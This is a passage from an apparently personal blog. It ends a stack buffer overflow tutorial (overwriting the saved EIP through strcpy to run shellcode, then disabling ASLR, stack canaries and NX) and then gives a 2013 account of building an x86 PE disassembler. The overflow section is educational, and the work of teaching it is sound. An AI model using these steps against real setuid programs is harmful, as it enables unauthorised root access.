So stack_vuln.exe is exec'd with our exploit string as argv[1], strcpy() copies this string into the stack buffer local_str, and the saved EIP is overwritten. Finally, when the ret instruction is executed in foo(), it pops the overwritten value, 0xbffffc2e, into the EIP register, and the CPU starts executing from that address, which holds NOPs followed by the shellcode. We now get a new shell opened up for us. If we need a root shell, the target program executable must have the setuid bit set so that it runs with an effective user ID of root (0).

Caveats:

  • The exploit string must not contain a NULL byte (value 00) because strcpy() and any other string functions will not copy past the NULL byte.
  • The stack address changes slightly between running the target program under a debugger and running it by itself. I have seen a difference of 32 bytes, i.e., local_str was at an address 32 bytes lower on the stack when run in a debugger. You must compensate for this in your exploit string.
  • Of course, modern operating systems and compilers come with protections against this attack - ASLR, NX bits and stack canaries. These must be disabled if you want to try this out (commands specific to Linux).
    • Disabling ASLR: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (plain 'sudo echo 0 > ...' fails because the shell performs the redirection without root privileges)
    • Removing stack protection: compile with -fno-stack-protector (no stack canary) and -z execstack (makes the stack executable, i.e., disables NX for the stack)

January 11, 2013

So I Wrote A Disassembler

It was the middle of the Texas summer; I had just returned from India to the USA and had absolutely no work to do, since I had not registered for any courses over the summer. Back in India, my mentor had suggested that I try my hand at writing a disassembler as a first step into the realm of low-level system code, OS internals and system software. So that's exactly what I did. I wrote a disassembler for 32-bit Windows PE files with support for integer, floating-point, MMX, SSE1 and AES instructions :D

Let me tell you, it was not an easy start. I had no clue where to even begin, so I started reading up on the format of PE files. I found a very good resource online for this: Matt Pietrek's explanation of the PE file format (MSDN Magazine, Feb 2002). I got stuck at one point trying to learn how to find where the code section actually begins in the binary; this article helped a lot in clearing my doubts, and that link also has some amazing work on x86 assembly and reverse engineering. One must also know about memory-mapped files. They come in very handy when you must read data from a file randomly instead of sequentially. Memory mapping is achieved with the help of the OS: it maps the file on the hard disk into virtual memory pages of the process that maps it. The process can then access the file contents just the way it accesses memory locations, via a pointer.

I then started reading the Intel Software Developer's Manuals, which give a huge amount of information on the processor architecture and, more importantly, the Instruction Set Architecture (ISA). Volume 2 describes the instruction format used by Intel processors and the detailed encoding of each and every assembly instruction. Since instructions in the x86 ISA have variable encoding lengths, it takes some effort to achieve a successful disassembly. When going through the ISA, one might think the instructions have random opcodes without any particular format, but that is far from the truth. Take a look at this document, which graphically depicts the opcodes of all instructions. Even though instructions are encoded into different sizes, it is easy to disassemble using the general instruction format given below.

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 | [Prefix] |  Opcode  | [ModR/M] |  [SIB]  |   [Disp]   |   [Imm]    |
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 |  up to 4 | 1-3bytes | 0/1byte  | 0/1byte | 0/1/2/4    | 0/1/2/4    |
 |  (1 byte |          |          |         |   bytes    |   bytes    |
 |   each)  |          |          |         |            |            |

Using the above format, we can start processing at the very first byte of the code section by checking whether it is a prefix/opcode and moving on from there. The state machine below gives a more accurate picture of the disassembly process. Links to the source code & binaries of my disassembler are posted in the Code Section. Look at the code and you will get a better understanding of the whole thing.

The ERROR state may be entered from any other state because of disassembly errors, like starting disassembly in the middle of an instruction or hitting an instruction that is not supported yet. If you look at the source code, there are about 9k LOC (with comments) for just the disassembly engine. This may sound like a lot, but it is only because of the number of different instructions; the processing logic (the opcode handlers) is the same for all of them. The only task is to determine which state to go to next from the current information, and there are a lot of if-else conditions to check because what the next byte means depends on what has been processed so far. The main part of disassembly, opcode processing, is easily done using jump tables - I used an array of function pointers that stores the addresses of the opcode-handler functions, so the appropriate function is called with a simple table lookup once the opcode byte is read.

It was a completely involving experience to work on this project, about one and a half months of summer time gone by in a flash of frantic coding! The very first time that I tested the code and saw a small snippet of the disassembler output on the geeky green color console window, I was elated, and eager to do more and complete the project. There is no better way than coding to kill time!